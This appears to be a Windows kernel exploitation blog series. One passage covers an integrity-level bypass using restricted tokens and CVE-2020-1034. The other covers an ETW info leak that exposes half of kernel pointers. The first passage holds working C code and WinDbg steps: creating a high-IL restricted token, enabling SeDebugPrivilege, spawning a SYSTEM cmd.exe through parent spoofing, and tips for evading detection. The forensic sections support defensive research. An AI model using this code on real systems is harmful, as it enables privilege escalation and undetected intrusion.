  1. The array of restricted SIDs is allocated immediately after the UserAndGroups array.

  2. It is possible to create a restricted token for any SID, including ones that the process doesn’t currently have.

These 2 facts mean that even as a low or medium IL process, we can create a restricted token for a high IL SID and impersonate it. This will add a new SID_AND_ATTRIBUTES entry to the RestrictedSids array, immediately after the UserAndGroups array, in a way that can be looked at as the next entry in the UserAndGroups array. The current IntegrityLevelIndex points to the last entry in the UserAndGroups array, so one little increment of the index will make it point to the new high IL restricted SID. How lucky are we to have an arbitrary increment vulnerability?

Let’s try this out. We use CreateWellKnownSid to create a WinHighLabelSid, then use CreateRestrictedToken to create a new restricted token with a high IL SID, and impersonate it:

HANDLE tokenHandle;
HANDLE newTokenHandle2;
PSID pSid;
PSID_AND_ATTRIBUTES sidAndAttributes;
DWORD sidLength = 0;
BOOL bRes;

//
// Call CreateWellKnownSid once to check the needed size for the buffer
//

CreateWellKnownSid(WinHighLabelSid, NULL, NULL, &sidLength);

//
// Allocate a buffer and create a high IL SID
//

pSid = malloc(sidLength);
CreateWellKnownSid(WinHighLabelSid, NULL, pSid, &sidLength);

//
// Create a restricted token and impersonate it
//

sidAndAttributes = (PSID_AND_ATTRIBUTES)malloc(sizeof(SID_AND_ATTRIBUTES));
sidAndAttributes->Sid = pSid;
sidAndAttributes->Attributes = 0;

bRes = OpenProcessToken(GetCurrentProcess(),
                        TOKEN_ALL_ACCESS,
                        &tokenHandle);

if (bRes == FALSE)
{
    printf("OpenProcessToken failed\n");
    return 0;
}

bRes = CreateRestrictedToken(tokenHandle,
                             WRITE_RESTRICTED,
                             0,
                             NULL,
                             0,
                             NULL,
                             1,
                             sidAndAttributes,
                             &newTokenHandle2);

if (bRes == FALSE)
{
    printf("CreateRestrictedToken failed\n");
    return 0;
}

bRes = ImpersonateLoggedOnUser(newTokenHandle2);
if (bRes == FALSE)
{
    printf("Impersonation failed\n");
    return 0;
}

Now let’s look at our thread token and its groups. Notice that we are impersonating this new token, so we need to check the impersonation token of our thread, as our primary process token is not affected by any of this:

dx -s @$token = ((nt!_TOKEN*)(@$curthread.KernelObject.ClientSecurity.ImpersonationToken & ~0xf))

dx new {GroupsCount = @$token->UserAndGroupCount, UserAndGroups = @$token->UserAndGroups, RestrictedCount = @$token->RestrictedSidCount, RestrictedSids = @$token->RestrictedSids, IntegrityLevelIndex = @$token->IntegrityLevelIndex}
new {GroupsCount = @$token->UserAndGroupCount, UserAndGroups = @$token->UserAndGroups, RestrictedCount = @$token->RestrictedSidCount, RestrictedSids = @$token->RestrictedSids, IntegrityLevelIndex = @$token->IntegrityLevelIndex}

GroupsCount      : 0xf [Type: unsigned long]
UserAndGroups    : 0xffffad890d5ffe00 [Type: _SID_AND_ATTRIBUTES *]
RestrictedCount  : 0x1 [Type: unsigned long]
RestrictedSids   : 0xffffad890d5ffef0 [Type: _SID_AND_ATTRIBUTES *]
IntegrityLevelIndex : 0xe [Type: unsigned long]

UserAndGroups still has 0xf entries and our IntegrityLevelIndex is still 0xe, like in the primary token. But now we have a restricted SID! I mentioned earlier that because of the memory layout we can treat this restricted SID like an additional entry in the UserAndGroups array, so let’s test that. We’ll try to dump the array the same way we did before, but pretend it has 0x10 entries:

dx -s @$sidAndAttr = *((nt!_SID_AND_ATTRIBUTES(*)[0x10])@$token->UserAndGroups)
dx -g @$sidAndAttr.Select(s => new {Attributes = s->Attributes, Sid = Debugger.Utility.Control.ExecuteCommand("!sid " + ((__int64)(s->Sid)).ToDisplayString("x"))[0].Remove(0, 8)})

And it works! It looks as if there are now 0x10 valid entries, and the last one has a high IL SID, just like we wanted.

Now we can run our exploit like we did before, with two small changes:

  1. All changes need to use our current thread token instead of the primary process token.

  2. We need to trigger the exploit twice – once to increment Privileges.Present to add SeDebugPrivilege and another time to increment IntegrityLevelIndex to point to entry 0xf.

Nothing ever validates that the IntegrityLevelIndex is lower than UserAndGroupCount (and if something did, we could use the same vulnerability to increment it as well). So, when our new impersonation token points to a high IL SID, SepAdjustPrivileges thinks that it is running as a high IL process and lets us enable whichever privilege we want. After making the changes to the exploit we can run it again and see that RtlAdjustPrivilege returns STATUS_SUCCESS this time. But I never fully believe the API and want to check for myself:

Or if you prefer WinDbg:

dx -s @$t0 = ((nt!_TOKEN*)(@$curthread.KernelObject.ClientSecurity.ImpersonationToken & ~0xf))

1: kd> !token @$t0 -n
_TOKEN 0xffffad89168c4970
TS Session ID: 0x1
User: S-1-5-21-2929524040-830648464-3312184485-1000 (User:DESKTOP-3USPPSB\yshafir)
User Groups:
...
Privs:
19 0x000000013 SeShutdownPrivilege               Attributes -
20 0x000000014 SeDebugPrivilege                  Attributes - Enabled
23 0x000000017 SeChangeNotifyPrivilege           Attributes - Enabled Default
25 0x000000019 SeUndockPrivilege                 Attributes -
33 0x000000021 SeIncreaseWorkingSetPrivilege     Attributes -
34 0x000000022 SeTimeZonePrivilege               Attributes -
Authentication ID:         (0,2a084)
Impersonation Level:       Impersonation
TokenType:                 Impersonation
...
RestrictedSidCount: 1      
RestrictedSids: 0xffffad89168c4ef0
Restricted SIDs:
00 S-1-16-12288 (Label: Mandatory Label\High Mandatory Level)
Attributes - Mandatory Default Enabled
…

Our impersonation token has SeDebugPrivilege, just like we wanted. Now we can do what we did last time and run an elevated cmd.exe under the DcomLaunch service. You might wonder if we really need to do that, now that we have a high IL token. But restricted tokens are still not really regular tokens, and we will probably face some issues if we try to run as a fake elevated process using a restricted token. It might also look a little suspicious to anyone who might be scanning our process, so it’s best to create a new process that can run as SYSTEM without any tricks.
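
For completeness, here is a minimal sketch of that last step using the documented parent-spoofing mechanism (PROC_THREAD_ATTRIBUTE_PARENT_PROCESS). It assumes SeDebugPrivilege is already enabled and that dcomLaunchPid holds the PID of the DcomLaunch service process – both placeholders here – and it shows one common way to do this step, not necessarily the exact approach from part 1:

#include <Windows.h>

BOOL SpawnCmdUnderParent (DWORD dcomLaunchPid)
{
    HANDLE parent = NULL;
    SIZE_T attrListSize = 0;
    STARTUPINFOEXW startInfo = { 0 };
    PROCESS_INFORMATION procInfo = { 0 };
    WCHAR cmdline[] = L"cmd.exe";
    BOOL result = FALSE;

    //
    // SeDebugPrivilege is what lets us open a SYSTEM process with
    // PROCESS_CREATE_PROCESS so it can be used as the parent.
    //
    parent = OpenProcess(PROCESS_CREATE_PROCESS, FALSE, dcomLaunchPid);
    if (parent == NULL)
    {
        return FALSE;
    }

    InitializeProcThreadAttributeList(NULL, 1, 0, &attrListSize);
    startInfo.lpAttributeList =
        (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, attrListSize);
    if (startInfo.lpAttributeList == NULL)
    {
        CloseHandle(parent);
        return FALSE;
    }
    InitializeProcThreadAttributeList(startInfo.lpAttributeList, 1, 0, &attrListSize);
    UpdateProcThreadAttribute(startInfo.lpAttributeList,
                              0,
                              PROC_THREAD_ATTRIBUTE_PARENT_PROCESS,
                              &parent,
                              sizeof(parent),
                              NULL,
                              NULL);
    startInfo.StartupInfo.cb = sizeof(startInfo);

    //
    // The new cmd.exe inherits its primary token from the chosen parent, so
    // it runs as SYSTEM even though our process is the one creating it.
    //
    result = CreateProcessW(NULL,
                            cmdline,
                            NULL,
                            NULL,
                            FALSE,
                            EXTENDED_STARTUPINFO_PRESENT | CREATE_NEW_CONSOLE,
                            NULL,
                            NULL,
                            &startInfo.StartupInfo,
                            &procInfo);

    DeleteProcThreadAttributeList(startInfo.lpAttributeList);
    HeapFree(GetProcessHeap(), 0, startInfo.lpAttributeList);
    CloseHandle(parent);
    if (result != FALSE)
    {
        CloseHandle(procInfo.hProcess);
        CloseHandle(procInfo.hThread);
    }
    return result;
}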

Forensics

This trick we’re using is pretty cool, not only because it lets us cheat the system but also because it’s pretty hard to detect. The biggest tell for anyone looking for it would be that the IntegrityLevelIndex is outside the bounds of the UserAndGroups array, but even if someone is looking for that, it’s easy enough to trigger the vulnerability one more time and increment UserAndGroupCount as well. This is still detectable if you calculate the end address of the UserAndGroups array based on the count and compare it with the start address of the RestrictedSids array, seeing that they don’t match. But that is a very specific detection, probably a bit too much for a very uncommon technique.

A second way to find this is to search for threads impersonating restricted tokens. This is pretty uncommon and when I run this query the only process that comes up is my exploit:

dx @$cursession.Processes.Where(p => p.Threads.Where(t => t.KernelObject.ActiveImpersonationInfo != 0 && ((nt!_TOKEN*)(t.KernelObject.ClientSecurity.ImpersonationToken & ~0xf))->RestrictedSidCount != 0).Count() != 0)
@$cursession.Processes.Where(p => p.Threads.Where(t => t.KernelObject.ActiveImpersonationInfo != 0 && ((nt!_TOKEN*)(t.KernelObject.ClientSecurity.ImpersonationToken & ~0xf))->RestrictedSidCount != 0).Count() != 0)
[0x279c]         : exploit_part_2.exe [Switch To]

But this is a very targeted search that will only find this very specific case. And anyway, it’s easy enough to avoid by making the thread revert back to its original token after the privilege is enabled. This is generally a good practice – don’t let your exploit keep “suspicious” attributes for longer than necessary, to minimize possible detections. However, all the forensic ideas I mentioned in the previous blog post still work in this case – we’re using the same vulnerability and triggering it the same way, so we still register a new ETW provider that no one else uses and leave occupied slots that can never be emptied without crashing the system. So if you know what to look for, this is a pretty decent way to find it.

And of course, there is the fact that a Medium IL process suddenly managed to grab SeDebugPrivilege, open a handle to DcomLaunch and create a new reparented, elevated process. That would (hopefully) raise some flags for a couple of EDR products.

Conclusion

This post described a hypothetical scenario where we can’t simply increment Privileges.Enabled in our process token. We currently don’t need all these fancy tricks, but they are very cool to find and exploit, sort of like a DIY CTF, and maybe one day they will turn out to be useful in another context. These tricks clearly show that the token contains lots of interesting fields that can be used in various ways, and how a single increment and some internals knowledge can take you a long way.

Since the token is this vulnerable and doesn’t tend to change very often, maybe it’s time to protect it better, for example by moving it to the Secure Pool?

In this post and the previous one I ended up grabbing SeDebugPrivilege and using a reparenting trick to create a new elevated process. In a future post that might happen one day, I will look at some other privileges that are mostly ignored in the exploitation field and can be used in new and unexpected ways.


The full PoC for this technique can be found here.


Exploiting a “Simple” Vulnerability – Part 1.5 – The Info Leak

Introduction

This post is not actually directly related to the first one and does not use CVE-2020-1034. It just talks about a second vulnerability that I found while researching ETW internals, which discloses the approximate location of the NonPaged pool to (almost) any user. It was spurred by a tweet that challenged me to find an information leak. It turns out I found one that wasn’t actually patched after all!

The vulnerability itself is not especially interesting, but the process of finding and understanding it was fun so I wanted to write about that. Also, when I reported it Microsoft marked it as “Important” but would not pay anything for it and eventually marked it as “won’t fix” even though fixing this issue takes less time than writing an email, so the annoyance factor alone makes writing this post worth it. And this is a chance to rant about some more ETW internals stuff which didn’t really fit into any of the other posts, so you can read them or skip right to the PoC, your choice.

Update

This vulnerability was eventually acknowledged by Microsoft and received CVE-2021-24107. It was fixed on 9/3/2021.

More ETW Internals!

Remember that the first thing you learn about ETW notifications is that they are asynchronous? Well, that was a lie. Sort of. Most ETW notifications really are asynchronous. However, in the previous blog post we used a vulnerability that relied on improper handling of the ReplyRequested field in the ETWP_NOTIFICATION_HEADER structure. The existence of this field implies that you can reply to an ETW event. But no one ever told you that you can reply to an ETW notification – how would that even work?

Normally, ETW works just the way you were told. That is the case for all Windows providers, and any other ETW provider I could find. But there is a "secret setting" that happens when someone notifies an ETW provider with ReplyRequested = 1. Then, as we saw in the previous blog post, the notification gets added to a reply queue and waits for a reply. Remember, there can only be 4 queued notifications waiting for a reply at any moment. When that happens, any process which registered for that provider has its registered callback notified and has a chance to reply to the notification using EtwReplyNotification. When someone replies to the notification, the original notification gets removed from the queue and the reply notification gets added to the reply queue.

The only case I could see so far where a reply is sent to a notification is immediately after a GUID is enabled – sechost!EnableTraceEx2 (which is the standard way of registering a provider and enabling a trace) has a call to ntdll!EtwSendNotification with EnableNotificationPacket->DataBlockHeader.ReplyRequested set to 1. That creates an EtwRegistration object, so before returning to Sechost, Ntdll immediately replies to the notification with NotificationHeader->NotificationType set to EtwNotificationTypeNoReply, simply to get it removed from the notification queue.

Specifically, in this case, something a little more complicated happens. Even though Ntdll is enabling the GUID, it’s not the “owner” of the registration instance and therefore doesn’t have a registered callback (since this belongs to whoever registered the provider). Yet Ntdll still needs to know when the kernel enables the provider, to queue the reply notification – it can’t expect the caller to know that this needs to be done. So to do this, it uses a trick.

When EtwRegisterProvider is called, it calls EtwpRegisterProvider. The first time this function is called, it calls EtwpRegisterTpNotificationOnce:

Without getting into too many internal details about waits and the thread pool, this function essentially creates an event with the callback function EtwpNotificationThread and then calls NtTraceControl with an Operation value of 27 – an undocumented and unknown value. Looking at the kernel side of things, it’s not too hard to give this value a name:

I’ll call this operation EtwAddNotificationEvent.

EtwpAddNotificationEvent is a pretty simple function: it receives an event handle, grabs the event object, and sets EventDataSource->NotificationEvent in the EPROCESS of the current process to the event (or NotificationEventWow64, if this is a WoW64 process). Since this field is a pointer and not a list, it can only contain one event at a time. If this field is not set to 0, the value won’t be set and the caller will receive STATUS_ALREADY_REGISTERED as a response status.

Then, in EtwpQueueNotification, immediately after a notification is added to the notification queue for the process, this event is signaled:

The event being signaled makes EtwpNotificationThread get called, since it was registered to wait on this event, so it is, in a way, an ETW notification callback that is being notified whenever the process receives an ETW notification. However, this function is not a real ETW notification callback, so it doesn’t receive the notification as any of its parameters and has to somehow get it by itself in order to reply to it. Luckily, it has a way to do that.

The first thing that EtwpNotificationThread does is make another call to NtTraceControl, this time with operation number 16 – EtwReceiveNotification. This operation leads to a call to EtwpReceiveNotification, which chooses the first queued notification for the process (and matching the process’ WoW64 status) and returns it. This operation requires no input arguments – it simply returns the first queued notification. This gives EtwpNotificationThread all the information that it needs to reply to that last queued notification quietly, without disturbing the unaware caller that simply asked it to register a provider. After replying, the event is set to a waiting state again, to wait for the next notification to arrive.

Most of this pretty long explanation has nothing to do with this vulnerability, which really is pretty small and simple and can be explained in a much less complicated way. But I did say this post was mostly an excuse to dump some more obscure ETW knowledge in hope that one day someone other than me will read it and find it helpful, so you all knew what you were getting into.

And now that we have all this unnecessary background, we can look at the vulnerability itself.

The InfoLeak

The issue is actually in the last part we talked about – returning the last queued notification. If you remember from the last post, when a GUID is notified and the notification header has ReplyRequested == 1, this leads to the creation of a kernel object which will be placed in the ReplyObject field of the notification that is later put in the notification queue. And this is the same structure that can be retrieved using NtTraceControl with EtwReceiveNotification operation… Does that mean that we get a free kernel pointer by calling NtTraceControl with the right arguments?

Not exactly. To be precise, you get half of a kernel pointer. Microsoft didn’t completely ignore the fact that returning kernel pointers to user-mode callers is a bad idea, like they did in so many other cases. The ReplyObject field in ETWP_NOTIFICATION_HEADER is in a union with ReplyHandle and RegIndex. And after copying the data to the user-mode buffer, they set the value of RegIndex, which should overwrite the kernel pointer that is in the same union:

The only thing that this code doesn’t account for is the fact that ReplyObject and RegIndex don’t have the same size: ReplyObject is a pointer (8 bytes on x64) while RegIndex is a ULONG (4 bytes). So setting RegIndex only overwrites the bottom half of the pointer, leaving the top half to be returned to the caller:
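
Separately from the kernel code that sentence refers to, the size mismatch itself is easy to demonstrate in isolation. The snippet below is just a standalone illustration of the bug class – a made-up union with the same shape – not the actual kernel structure:

#include <stdio.h>
#include <stdint.h>

//
// Illustration only: a union shaped like the one described above, where
// "sanitizing" the 4-byte RegIndex member leaves the top half of the 8-byte
// pointer untouched.
//
typedef union _REPLY_UNION
{
    void     *ReplyObject;   // 8 bytes on x64
    uint64_t  ReplyHandle;
    uint32_t  RegIndex;      // only 4 bytes
} REPLY_UNION;

int main (void)
{
    REPLY_UNION u;

    u.ReplyObject = (void*)(uintptr_t)0xffff9d0012345678ULL;  // pretend kernel pointer
    u.RegIndex = 3;                                           // the "sanitizing" write

    //
    // The low 32 bits now hold the index, but the high 32 bits of the
    // original pointer still leak out.
    //
    printf("value returned to the caller: 0x%016llx\n",
           (unsigned long long)u.ReplyHandle);
    return 0;
}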

Triggering this is extremely simple and includes exactly three steps:

  1. Register a provider
  2. Queue a notification where ReplyObject is a kernel object – do this by calling NtTraceControl with operation == EtwSendDataBlock and ReplyRequested == TRUE in the notification header.
  3. Call NtTraceControl with operation == EtwReceiveNotification and get your half of a kernel pointer.

It’s true that the top half of a kernel address is not all that much, but it can still give a caller a better guess of where the NonPagedPool (where those objects are allocated) is found. In fact, since the NonPagedPool is sized 16TB (or 0x100000000000 bytes), this vulnerability tells us exactly where the NonPaged pool is, and we can validate that in the debugger:

!vm 21
...
System Region               Base Address    NumberOfBytes
SecureNonPagedPool    : ffff838000000000       8000000000
KernelShadowStacks    : ffff888000000000       8000000000
PagedPool             : ffff8a0000000000     100000000000
NonPagedPool          : ffff9d0000000000     100000000000
SystemCache           : ffffb00000000000     100000000000
SystemPtes            : ffffc40000000000     100000000000
UltraZero             : ffffd40000000000     100000000000
Session               : ffffe40000000000       8000000000
PfnDatabase           : ffffe78000000000      c8000000000
PageTables            : fffff40000000000       8000000000
SystemImages          : fffff80000000000       8000000000
Cfg                   : fffffaf0ea2331d0      28000000000
HyperSpace            : fffffd0000000000      10000000000
KernelStacks          : fffffe0000000000      10000000000

This can be triggered by almost any user, including Low IL and AppContainer processes. Since most of the classic infoleaks don’t work there anymore, this might be of some use, even if a limited one.

I believe that when this code was introduced, it was completely safe – those areas of the code are pretty ancient and get very few changes. This code was probably written in the days before x64, when the size of a pointer and the size of a ULONG were the same, so setting RegIndex did overwrite the whole object address. When x64 changed the size of a pointer, this code was left behind and never updated to match, so this bug appeared.

This makes you wonder: what similar bugs might exist in other pieces of ancient code that even Microsoft forgot about?

Just Show Me the Code Already!

In case you want to see the three lines of code that trigger this bug, you can find them here.